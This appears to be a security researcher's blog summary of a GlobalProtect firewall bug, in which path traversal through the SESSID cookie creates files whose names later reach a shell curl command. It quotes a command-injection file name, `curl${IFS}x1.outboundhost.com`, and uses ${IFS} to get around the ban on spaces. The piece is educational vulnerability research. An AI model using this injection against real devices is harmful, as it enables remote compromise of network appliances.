Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

While fuzzing the Global Protect firewall, they noticed some interesting behavior in the logs. If they attached a semicolon to the SESSID parameter, some strange logs showed up - failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is super interesting. This is where the bug begins!

The EOF indicates that it's reading a file. Since we added the semicolon, there's no file with that inside of it. Adding in a slash for a directory gives us the nicer error failed to load file. Sick! It's reading a file and we're able to control this. What about directory traversal?

If it cannot find the directory, then it will attempt to create it. If the file doesn't exist, then it simply creates a zero byte file with the filename intact. By itself, this doesn't seem to have much of an impact. However, weird primitives lead to the breaking of security assumptions that may no longer be true. So, all we have to do is find some rule that we can violate.

Within the telemetry code, it is injesting log files. When doing this, it creates a curl command with shell capabilities to transfer the file. Now, there is an arbitrary file name in a bash command. That previous primitive seems super nice now! While playing around with this, they noticed that spaces weren't allowed within the cookie values. So, we have to get creative!

{IFS} can be used for a space within bash. So, if we create a filename with bash metacharacters, like semicolons or backticks, we can inject arbitrary commands! For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in the name will create an outbound curl request. Neat!

Although not mentioned in the original post, the vulnerability appears to be within an underlying library called Gorilla sessions. So, this primitive of writing arbitrary files likely affects A LOT more things than just this application.

Overall, an awesome post on a bizarre command injection. This took a weird arbitrary file write to trigger, but was interesting. To me, a takeaway is that fuzzing is useful but it's not a launch and let go. Instead, reading the error messages, responses and all other available information to look for weird behavior is worth while.